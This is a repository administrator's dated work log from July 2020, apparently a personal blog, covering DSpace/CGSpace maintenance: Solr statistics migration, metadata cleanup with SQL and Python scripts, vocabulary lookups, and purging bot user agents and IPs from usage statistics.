+ReactorNetty\/\d
+sqlmap
+Typhoeus
+7siters
+
    +
  • Just a note that I still can’t deploy the 6_x-dev-atmire-modules branch as it fails at ant update:
  • +
+
     [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'DefaultStorageUpdateConfig': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cuaEPersonStorageReportService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
+
    +
  • I had told Atmire about this several weeks ago… but I reminded them again in the ticket +
      +
    • Atmire says they are able to build fine, so I tried again and noticed that I had been building with -Denv=dspacetest.cgiar.org, which is not necessary for DSpace 6 of course
    • +
    • Once I removed that it builds fine
    • +
    +
  • +
  • I quickly re-applied the Font Awesome 5 changes to use SVG+JS instead of web fonts (from 2020-04) and things are looking good!
  • +
  • Run all system updates on DSpace Test (linode26), deploy latest 6_x-dev-atmire-modules branch, and reboot it
  • +
+

2020-07-02

+
    +
  • I need to export some Solr statistics data from CGSpace to test Salem’s modifications to the dspace-statistics-api +
      +
    • He modified it to query Solr on the fly instead of indexing it, which will be heavier and slower, but allows us to get more granular stats and countries/cities
    • +
    • Because we have so many records I want to use solr-import-export-json to export several months at a time with a date range, but first there were some issues with curl (I need to disable globbing with -g and URL encode the range)
    • +
    • For reference, the Solr 4.10.x DateField docs
    • +
    • This range works in Solr UI: [2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]
    • +
    • As well in curl:
    • +
    +
  • +
+
$ curl -g -s 'http://localhost:8081/solr/statistics-2019/select?q=*:*&fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&rows=0&wt=json&indent=true'
+{
+  "responseHeader":{
+    "status":0,
+    "QTime":0,
+    "params":{
+      "q":"*:*",
+      "indent":"true",
+      "fq":"time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]",
+      "rows":"0",
+      "wt":"json"}},
+  "response":{"numFound":7784285,"start":0,"docs":[]
+  }}
+
    +
  • But not in solr-import-export-json… hmmm… seems we need to URL encode only the date range itself, but not the brackets:
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]' -k uid
+$ zstd /tmp/statistics-2019-1.json
+
    +
  • Then import it on my local dev environment:
  • +
+
$ zstd -d statistics-2019-1.json.zst
+$ ./run.sh -s http://localhost:8080/solr/statistics -a import -o ~/Downloads/statistics-2019-1.json -k uid
+
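  • A quick way to sanity check the import afterwards (a sketch; local Solr at port 8080 as above) is to count the documents in the same date range, which should match the numFound from the export query:
$ curl -s 'http://localhost:8080/solr/statistics/select?q=*:*&fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&rows=0&wt=json' | grep -o '"numFound":[0-9]*'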

2020-07-05

+
    +
  • Import twelve items into the CRP Livestock multimedia collection for Peter Ballantyne +
      +
    • I ran the data through csv-metadata-quality first to validate and fix some common mistakes
    • +
    • Interesting to check the data with csvstat to see if there are any duplicates
    • +
    +
  • +
  • Peter recently asked me to add Target audience (cg.targetaudience) to the CGSpace sidebar facets and AReS filters +
      +
    • I added it on my local DSpace test instance, but I’m waiting for him to tell me what he wants the header to be “Audiences” or “Target audience” etc…
    • +
    +
  • +
  • Peter also asked me to increase the size of links in the CGSpace “Welcome” text +
      +
    • I suggested using the CSS font-size: larger property to just bump it up one relative to what it already is
    • +
    • He said it looks good, but that the links actually seem OK now (I told him to refresh, as I had made them bold a few days ago), so we don’t need to adjust it after all
    • +
    +
  • +
  • Mohammed Salem modified my dspace-statistics-api to query Solr directly so I started writing a script to benchmark it today +
      +
    • I will monitor the JVM memory and CPU usage in visualvm, just like I did in 2019-04
    • +
    • I noticed an issue with his limit parameter so I sent him some feedback on that in the meantime
    • +
    +
  • +
  • I noticed that we have 20,000 distinct values for dc.subject, but there are at least 500 that are lower or mixed case that we should simply uppercase without further thought:
  • +
+
dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
+
    +
  • DSpace Test needs a different query because it is running DSpace 6 with UUIDs for everything:
  • +
+
dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
+
    +
  • Note the use of the POSIX character class :)
  • +
  • I suggest that we generate a list of the top 5,000 values that don’t match AGROVOC so that Sisay can correct them +
      +
    • Start by getting the top 6,500 subjects (assuming that the top ~1,500 are valid from our previous work):
    • +
    +
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY text_value ORDER BY count DESC) TO /tmp/2020-07-05-subjects.csv WITH CSV;
+COPY 19640
+dspace=# \q
+$ csvcut -c1 /tmp/2020-07-05-subjects-upper.csv | head -n 6500 > 2020-07-05-cgspace-subjects.txt
+
    +
  • Then start looking them up using agrovoc-lookup.py:
  • +
+
$ ./agrovoc-lookup.py -i 2020-07-05-cgspace-subjects.txt -om 2020-07-05-cgspace-subjects-matched.txt -or 2020-07-05-cgspace-subjects-rejected.txt -d
+

2020-07-06

+
    +
  • I made some optimizations to the suite of Python utility scripts in our DSpace directory as well as the csv-metadata-quality script +
      +
    • Mostly to make more efficient usage of the requests cache and to use parameterized requests instead of building the request URL by concatenating the URL with query parameters
    • +
    +
  • +
  • I modified the agrovoc-lookup.py script to save its results as a CSV, with the subject, language, type of match (preferred, alternate, and total number of matches) rather than save two separate files +
      +
    • Note that I see prefLabel, matchedPrefLabel, and altLabel in the REST API responses and I’m not sure what the second one means
    • +
    • I emailed FAO’s AGROVOC contact to ask them
    • +
    • They responded to say that matchedPrefLabel is not a property in SKOS/SKOSXL vocabulary, but their SKOSMOS system seems to use it to hint that the search terms matched a prefLabel in another language
    • +
    • I will treat the matchedPrefLabel values as if they were prefLabel values for the indicated language then
    • +
    +
  • +
+

2020-07-07

+
    +
  • Peter asked me to send him a list of sponsors on CGSpace
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
+COPY 707
+
    +
  • I ran it quickly through my csv-metadata-quality tool and found two issues that I will correct with fix-metadata-values.py on CGSpace immediately:
  • +
+
$ cat 2020-07-07-fix-sponsors.csv
+dc.description.sponsorship,correct
+"Ministe`re des Affaires Etrange`res et Européennes, France","Ministère des Affaires Étrangères et Européennes, France"
+"Global Food Security Programme,  United Kingdom","Global Food Security Programme, United Kingdom"
+$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
+
    +
  • Upload the Capacity Development July newsletter to CGSpace for Ben Hack because Abenet and Bizu usually do it, but they are currently offline due to the Internet being turned off in Ethiopia + +
  • +
  • I implemented the Dimensions.ai badge on DSpace Test for Peter to see, as he’s been asking me for a while:
  • +
+

Dimensions.ai badge

+
    +
  • It was easy once I figured out how to do the XSLT in the DSpace theme (need to get the DOI link and remove the “https://doi.org/" from the string) +
      +
    • Actually this raised an issue that the Altmetric badges weren’t enabled in our DSpace 6 branch yet because I had forgotten to copy the config
    • +
    • Also, I noticed a big issue in both our DSpace 5 and DSpace 6 branches related to the $identifier_doi variable being defined incorrectly and thus never getting set (has to do with DRI)
    • +
    • I fixed both and now the Altmetric badge and the Dimensions badge both appear… nice
    • +
    +
  • +
+

Altmetric and Dimensions.ai badge

+

2020-07-08

+
    +
  • Generate a CSV of all the AGROVOC subjects that didn’t match from the top 6500 I exported earlier this week:
  • +
+
$ csvgrep -c 'number of matches' -r "^0$" 2020-07-05-cgspace-subjects.csv | csvcut -c 1 > 2020-07-05-cgspace-invalid-subjects.csv
+
    +
  • Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors’ names because of “funny character” issues with reports generated from CGSpace +
      +
    • I told her that it’s probably her Windows / Excel that is messing up the data, and she figured out how to open them correctly!
    • +
    • Now she says she doesn’t want to remove the accents after all and she sent me a new list of corrections
    • +
    • I used csvgrep and found a few where she is still removing accents:
    • +
    +
  • +
+
$ csvgrep -c 2 -r "^.+$" ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r "^.*[À-ú].*$" | csvgrep -c 2 -r "^.*[À-ú].*$" -i | csvcut -c 1,2
+dc.contributor.author,correction
+"López, G.","Lopez, G."
+"Gómez, R.","Gomez, R."
+"García, M.","Garcia, M."
+"Mejía, A.","Mejia, A."
+"Quiróz, Roberto A.","Quiroz, R."
+
    +
  • +

    csvgrep from the csvkit suite is so cool:

    +
      +
    • Select lines with column two (the correction) having a value
    • +
    • Select lines with column one (the original author name) having an accent / diacritic
    • +
    • Select lines with column two (the correction) NOT having an accent (ie, she’s not removing an accent)
    • +
    • Select columns one and two
    • +
    +
  • +
  • +

    Peter said he liked the work I did on the badges yesterday, so I put some finishing touches on it to detect more DOI URI styles and pushed it to the 5_x-prod branch

    +
      +
    • I will port it to DSpace 6 soon
    • +
    +
  • +
+

Altmetric and Dimensions badges

+
    +
  • I wrote a quick script to look up organizations (affiliations) in the Research Organization Registry (ROR) JSON data release v5 +
      +
    • I want to use this to evaluate ROR as a controlled vocabulary for CGSpace and MELSpace
    • +
    • I exported a list of affiliations from CGSpace:
    • +
    +
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
+
    +
  • Then I stripped the CSV header and quotes to make it a plain text file and ran ror-lookup.py:
  • +
+
$ ./ror-lookup.py -i /tmp/2020-07-08-affiliations.txt -r ror.json -o 2020-07-08-affiliations-ror.csv -d
+$ wc -l /tmp/2020-07-08-affiliations.txt 
+5866 /tmp/2020-07-08-affiliations.txt
+$ csvgrep -c matched -m true 2020-07-08-affiliations-ror.csv | wc -l 
+1406
+$ csvgrep -c matched -m false 2020-07-08-affiliations-ror.csv | wc -l
+4462
+
    +
  • So, minus the CSV header, we have 1405 case-insensitive matches out of 5866 (23.9%)
  • +
+
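  • For the header/quote stripping step above, something like this works (a rough sketch, not necessarily the exact commands I used; it ignores embedded quotes):
$ csvcut -c 'cg.contributor.affiliation' /tmp/2020-07-08-affiliations.csv | sed -e '1d' -e 's/^"//' -e 's/"$//' > /tmp/2020-07-08-affiliations.txt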

2020-07-09

+
    +
  • Atmire responded to the ticket about DSpace 6 and Solr yesterday +
      +
    • They said that the CUA issue is due to the “unmigrated” Solr records and that we should delete them
    • +
    • I told them that the “unmigrated” IDs are a known issue in DSpace 6 and we should rather figure out why they are unmigrated
    • +
    • I didn’t see any discussion on the dspace-tech mailing list or on DSpace Jira about unmigrated IDs, so I sent a mail to the mailing list to ask
    • +
    +
  • +
  • I updated ror-lookup.py to check aliases and acronyms as well and now the results are better for CGSpace’s affiliation list:
  • +
+
$ wc -l /tmp/2020-07-08-affiliations.txt 
+5866 /tmp/2020-07-08-affiliations.txt
+$ csvgrep -c matched -m true 2020-07-08-affiliations-ror.csv | wc -l 
+1516
+$ csvgrep -c matched -m false 2020-07-08-affiliations-ror.csv | wc -l
+4352
+
    +
  • So now our matching improves to 1515 out of 5866 (25.8%)
  • +
  • Gabriela from CIP said that I should run the author corrections minus those that remove accent characters so I will run it on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correction -m 3
+
    +
  • Apply 110 fixes and 90 deletions to sponsorships that Peter sent me a few days ago:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct/action' -m 29
+$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
+
    +
  • Start a full Discovery re-index on CGSpace:
  • +
+
$ time chrt -b 0 dspace index-discovery -b
+
+real    94m21.413s
+user    9m40.364s
+sys     2m37.246s
+
    +
  • I modified crossref-funders-lookup.py to be case insensitive and now CGSpace’s sponsors match 173 out of 534 (32.4%):
  • +
+
$ ./crossref-funders-lookup.py -i 2020-07-09-cgspace-sponsors.txt -o 2020-07-09-cgspace-sponsors-crossref.csv -d -e a.orth@cgiar.org
+$ wc -l 2020-07-09-cgspace-sponsors.txt
+534 2020-07-09-cgspace-sponsors.txt
+$ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l 
+174
+

2020-07-12

+
    +
  • On 2020-07-10 Macaroni Bros emailed to ask if there are issues with CGSpace because they are getting HTTP 504 on the REST API +
      +
    • First, I looked in Munin and I see a high number of DSpace sessions and threads on Friday evening around midnight, though that was much later than his email:
    • +
    +
  • +
+

DSpace sessions +Threads +PostgreSQL locks +PostgreSQL transactions

+
    +
  • CPU load and memory were not high then, but there was some load on the database and firewall… +
      +
    • Looking in the nginx logs I see a few IPs we’ve seen recently, like those 199.47.x.x IPs from Turnitin (which I need to remember to purge from Solr again because I didn’t update the spider agents on CGSpace yet) and some new one 186.112.8.167
    • +
    • Also, the Turnitin bot doesn’t re-use its Tomcat JSESSIONID, I see this from today:
    • +
    +
  • +
+
# grep 199.47.87 dspace.log.2020-07-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+2815
+
    +
  • So I need to add this alternative user-agent to the Tomcat Crawler Session Manager valve to force it to re-use a common bot session
  • +
  • There are around 9,000 requests from 186.112.8.167 in Colombia with the user agent Java/1.8.0_241, but those were mostly to the REST API and I don’t see any hits in Solr
  • +
  • Earlier in the day Linode had alerted that there was high outgoing bandwidth +
      +
    • I see some new bot from 134.155.96.78 made ~10,000 requests with the user agent… but it appears to already be in our DSpace user agent list via COUNTER-Robots:
    • +
    +
  • +
+
Mozilla/5.0 (compatible; heritrix/3.4.0-SNAPSHOT-2019-02-07T13:53:20Z +http://ifm.uni-mannheim.de)
+
    +
  • Generate a list of sponsors to update our controlled vocabulary:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
+COPY 125
+dspace=# \q
+$ csvcut -c 1 --tabs /tmp/2020-07-12-sponsors.csv > dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
+# add XML formatting
+$ dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
+$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
+
    +
  • Deploy latest 5_x-prod branch on CGSpace (linode18), run all system updates, and reboot the server +
      +
    • After rebooting it I had to restart Tomcat 7 once to get all Solr statistics cores to come up properly
    • +
    +
  • +
+

2020-07-13

+
    +
  • I recommended to Marie-Angelique that we use ROR for CG Core V2 (#27)
  • +
  • Purge 2,700 hits from CodeObia IP addresses in CGSpace statistics… I wonder when they will figure out how to use a bot user agent
  • +
+

2020-07-14

+
    +
  • I ran the dspace cleanup -v process on CGSpace and got an error:
  • +
+
Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(189618) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);'
+UPDATE 1
+
+

2020-07-15

+
    +
  • All four IWMI items that I tweeted yesterday have Altmetric donuts with a score of 1 now…
  • +
  • Export CGSpace countries to check them against ISO 3166-1 and ISO 3166-3 (historic countries):
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-07-15-countries.csv;
+COPY 194
+
  • I wrote a script, iso3166-1-lookup.py, to check them:
+
$ ./iso3166-1-lookup.py -i /tmp/2020-07-15-countries.csv -o /tmp/2020-07-15-countries-resolved.csv
+$ csvgrep -c matched -m false /tmp/2020-07-15-countries-resolved.csv       
+country,match type,matched
+CAPE VERDE,,false
+"KOREA, REPUBLIC",,false
+PALESTINE,,false
+"CONGO, DR",,false
+COTE D'IVOIRE,,false
+RUSSIA,,false
+SYRIA,,false
+"KOREA, DPR",,false
+SWAZILAND,,false
+MICRONESIA,,false
+TIBET,,false
+ZAIRE,,false
+COCOS ISLANDS,,false
+LAOS,,false
+IRAN,,false
+
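
A quick way to spot-check one of these names against ISO 3166-1 by hand is to query the iso-codes JSON (the same /usr/share/iso-codes/json/iso_3166-1.json file I look at below in 2020-07-30) — a sketch, assuming the Debian iso-codes package is installed:

$ jq -r '.["3166-1"][] | .name' /usr/share/iso-codes/json/iso_3166-1.json | grep -i verde
Cabo Verde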
  • Check the database for DOIs that are not in the preferred “https://doi.org/” format:
+
dspace=# \COPY (SELECT text_value as "cg.identifier.doi" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE 'https://doi.org/%') TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
+COPY 186
+
    +
  • Then I imported them into OpenRefine and replaced them in a new “correct” column using this GREL transform:
  • +
+
value.replace("dx.doi.org", "doi.org").replace("http://", "https://").replace("https://dx,doi,org", "https://doi.org").replace("https://doi.dx.org", "https://doi.org").replace("https://dx.doi:", "https://doi.org").replace("DOI: ", "https://doi.org/").replace("doi: ", "https://doi.org/").replace("http:/​/​dx.​doi.​org", "https://doi.org").replace("https://dx. doi.org. ", "https://doi.org").replace("https://dx.doi", "https://doi.org").replace("https://dx.doi:", "https://doi.org/").replace("hdl.handle.net", "doi.org")
+
    +
  • Then I fixed the DOIs on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.doi -t 'correct' -m 220
+
  • I filed an issue on Debian’s iso-codes project to ask why “Swaziland” does not appear in the ISO 3166-3 list of historical country names despite it being changed to “Eswatini” in 2018
  • Atmire responded about the Solr issue
      • They said that it seems like a DSpace issue, so it’s not their responsibility, and nobody responded to my question on the dspace-tech mailing list…
      • I said I would try to do a migration on DSpace Test with more of CGSpace’s Solr data to try and approximate how much of our data would be affected
      • I also asked them about the Tomcat 8.5 issue with CUA as well as the CUA group name issue that I had originally asked about in April
+

2020-07-20

+
    +
  • Looking at the nginx logs on CGSpace (linode18) last night I see that the Macaroni Bros have started using a unique identifier for at least one of their harvesters:
  • +
+
217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] "GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0" 302 138 "-" "ILRI Livestock Website Publications importer BOT"
+
  • I still see 12,000 records in Solr from this user agent, though
      • I wonder why the DSpace bot list didn’t catch those… it has “bot” in it, which should cause Solr to not log the hit
  • I purged ~30,000 hits from Solr statistics based on the IPs above, but also for some agents like Drupal (which isn’t in the list yet) and OgScrper (which is, as of 2020-03)
  • Some of my user agent patterns had been incorporated into COUNTER-Robots in 2020-07, but not all
  • I re-ran the check-spider-hits.sh script with the new lists and purged around 14,000 more stats hits from each of several years (2020, 2019, 2018, 2017, 2016), around 70,000 total
  • I looked at the CLARISA institutions list again, since I hadn’t looked at it in over six months:
+
$ cat ~/Downloads/response_1595270924560.json | jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
+
  • The API still needs a key unless you query it from the Swagger web interface
      • They currently have 3,469 institutions…
      • Also, they still combine multiple text names into one string along with acronyms and countries:
          • Bundesministerium für wirtschaftliche Zusammen­arbeit und Entwicklung / Federal Ministry of Economic Cooperation and Development (Germany)
          • Ministerio del Ambiente / Ministry of Environment (Peru)
          • Carthage University / Université de Carthage
          • Sweet Potato Research Institute (SPRI) of Chinese Academy of Agricultural Sciences (CAAS)
      • And I checked the list with my csv-metadata-quality tool and found it still has whitespace and unnecessary Unicode characters in several records:
+
$ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv
+Removing excessive whitespace (name): Comitato Internazionale per lo Sviluppo dei Popoli /  International Committee for the Development of Peoples
+Removing excessive whitespace (name): Deutsche Landwirtschaftsgesellschaft /  German agriculture society
+Removing excessive whitespace (name): Institute of Arid Regions  of Medenine
+Replacing unnecessary Unicode (U+00AD): Bundesministerium für wirtschaftliche Zusammen­arbeit und Entwicklung / Federal Ministry of Economic Cooperation and Development (Germany)
+Removing unnecessary Unicode (U+200B): Agencia de Servicios a la Comercialización​ y Desarrollo de Mercados Agropecuarios
+
  • I think ROR is much better in every possible way
  • Re-enabled all the yearly Solr statistics cores on DSpace Test (linode26) because they had been disabled by Atmire when they were testing on the server
      • Run system updates on the server and reboot it
+

2020-07-21

  • I built the latest 6.x branch on DSpace Test (linode26) and I noticed a few Font Awesome icons are missing in the Atmire CUA statlets
      • One was simple to fix by adding it to our font library in fontawesome.js, but there are two more that are printing hex values instead of using HTML elements:

Screenshot: Atmire CUA missing icons

  • I had previously thought these were fixed by setting the font-family on the elements, but it doesn’t appear to be working now
      • I filed a ticket with Atmire to ask them to use the HTML elements instead, as their code already uses those elsewhere
      • I don’t want to go back to using the large webfonts with CSS because the SVG + JS method saves us ~140KiB and makes at least three fewer network requests
  • I started processing the 2019 stats in batches of 1 million on DSpace Test:
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
+...
+        *** Statistics Records with Legacy Id ***
+
+           6,359,966    Bistream View
+           2,204,775    Item View
+             139,266    Community View
+             131,234    Collection View
+             948,529    Community Search
+             593,974    Collection Search
+           1,682,818    Unexpected Type & Full Site
+        --------------------------------------
+          12,060,562    TOTAL
+
    +
  • The statistics-2019 finished processing after about 9 hours so I started the 2018 ones:
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
+        *** Statistics Records with Legacy Id ***
+
+           3,684,394    Bistream View
+           2,183,032    Item View
+             131,222    Community View
+              79,348    Collection View
+             345,529    Collection Search
+             322,223    Community Search
+             874,107    Unexpected Type & Full Site
+        --------------------------------------
+           7,619,855    TOTAL
+
    +
  • Moayad finally made OpenRXV use a unique user agent:
  • +
+
OpenRXV harvesting bot; https://github.com/ilri/OpenRXV
+
  • I see nearly 200,000 hits in Solr from the IP address, though, so I need to make sure those are old ones from before today
      • I purged the hits for 178.62.93.141 as well as any from the old axios/0.19.2 user agent
      • I made some requests with and without the new user agent and only the ones without showed up in Solr
+

2020-07-22

+
  • Atmire merged my latest bot suggestions to the COUNTER-Robots project
  • I will update the agent patterns on the CGSpace 5_x-prod and 6.x branches
  • Make some changes to the Bootstrap CSS and HTML configuration to improve readability and style on the CG Core v2 metadata reference guide and send a pull request to Marie (#29)
  • The solr-upgrade-statistics-6x tool keeps crashing due to memory issues when processing the 2018 stats
      • I reduced the number of records per batch from 10,000 to 5,000 and increased the memory to 3072m and it still crashes…
      • I reduced the number of records per batch to 1,000 and it works, but it still took around twenty minutes before it even started!
      • Eventually, after processing a few million records, it crashed with this error:
+
Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+
    +
  • There were four records so I deleted them:
  • +
+
$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:10</query></delete>'
+
    +
  • Meeting with Moayad and Peter and Abenet to discuss the latest AReS changes
  • +
+

2020-07-23

  • I closed all issues in the OpenRXV and AReS GitHub repositories with screenshots so that Moayad can use them for his invoice
  • The statistics-2018 core always crashes with the same error even after I deleted the “id:10” records…
      • I started the statistics-2017 core and it finished in 3:44:15
      • I started the statistics-2016 core and it finished in 2:27:08
      • I started the statistics-2015 core and it finished in 1:07:38
      • I started the statistics-2014 core and it finished in 1:45:44
      • I started the statistics-2013 core and it finished in 1:41:50
      • I started the statistics-2012 core and it finished in 1:23:36
      • I started the statistics-2011 core and it finished in 0:39:37
      • I started the statistics-2010 core and it finished in 0:01:46
+

2020-07-24

+
  • Looking at the statistics-2019 Solr stats I see some interesting user agents and IPs
      • For example, I see 568,000 requests from 66.109.27.x in 2019-10, all with the same exact user agent:
+
Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
+
  • Also, in the same month with the same exact user agent, I see 300,000 from 192.157.89.x
      • The 66.109.27.x IPs belong to galaxyvisions.com
      • The 192.157.89.x IPs belong to cologuard.com
      • All these hosts were reported in late 2019 on abuseipdb.com
  • Then I see another one, 163.172.71.23, that made 215,000 requests in 2019-09 and 2019-08
      • It belongs to poneytelecom.eu and is also in abuseipdb.com for PHP injection and directory traversal
      • It uses this user agent:
+
Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+
  • In statistics-2018 I see more weird IPs
      • 54.214.112.202 made 839,000 requests with no user agent…
          • It is on Amazon Web Services (AWS) and made 100% statistics_type:view, so I guess it was harvesting via the REST API
      • A few IPs owned by perfectip.net made 400,000 requests in 2018-01
          • They are 2607:fa98:40:9:26b6:fdff:feff:195d and 2607:fa98:40:9:26b6:fdff:feff:1888 and 2607:fa98:40:9:26b6:fdff:feff:1c96 and 70.36.107.49
          • All the requests used this user agent:
+
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
+
  • Then there is 213.139.53.62 in 2018, which is on Orange Telecom Jordan, so it’s definitely CodeObia / ICARDA and I will purge them
  • Jesus, and then there are 100,000 from the ILRI harvester on Linode on 2a01:7e00::f03c:91ff:fe0a:d645
  • Jesus fuck, there is 46.101.86.248 making 15,000 requests per month in 2018 with no user agent…
  • Jesus fuck, there is 84.38.130.177 in Latvia that was making 75,000 requests in 2018-11 and 2018-10
  • Jesus fuck, there is 104.198.9.108 on Google Cloud that was making 30,000 requests with no user agent
  • I will purge the hits from all the following IPs:
+
192.157.89.4
+192.157.89.5
+192.157.89.6
+192.157.89.7
+66.109.27.142
+66.109.27.139
+66.109.27.138
+66.109.27.140
+66.109.27.141
+2607:fa98:40:9:26b6:fdff:feff:1888
+2607:fa98:40:9:26b6:fdff:feff:195d
+2607:fa98:40:9:26b6:fdff:feff:1c96
+213.139.53.62
+2a01:7e00::f03c:91ff:fe0a:d645
+46.101.86.248
+54.214.112.202
+84.38.130.177
+104.198.9.108
+70.36.107.49
+
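
One way to do the purging is with Solr delete-by-query requests against the ip field, looping over the list — a rough sketch, assuming the same local Solr on port 8081 used elsewhere in these notes, that the addresses are saved to /tmp/ips.txt, and that the same delete is repeated for each yearly statistics core:

$ while read -r ip; do curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>ip:\"$ip\"</query></delete>"; done < /tmp/ips.txt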
  • In total these accounted for the following number of requests in each year:
      • 2020: 1436
      • 2019: 960274
      • 2018: 1588149
  • I noticed a few other user agents that should be purged too:
+
^Java\/\d{1,2}.\d
+FlipboardProxy\/\d
+API scraper
+RebelMouse\/\d
+Iframely\/\d
+Python\/\d
+Ruby
+NING\/\d
+ubermetrics-technologies\.com
+Jetty\/\d
+scalaj-http\/\d
+mailto\:team@impactstory\.org
+
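
Before purging, the number of hits one of these patterns matches can be checked with a regular expression query on the userAgent field — a sketch along these lines, assuming userAgent is a plain string field as in the stock DSpace statistics schema:

$ curl -s 'http://localhost:8081/solr/statistics/select?q=userAgent:/Java\/[0-9].*/&rows=0&wt=json' | jq '.response.numFound'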
  • I purged them from the stats too:
      • 2020: 19553
      • 2019: 29745
      • 2018: 18083
      • 2017: 19399
      • 2016: 16283
      • 2015: 16659
      • 2014: 713
+

2020-07-26

  • I continued with the Solr ID to UUID migrations (solr-upgrade-statistics-6x) from last week and updated my notes for each core above
      • After all cores finished migrating I optimized them to delete old documents
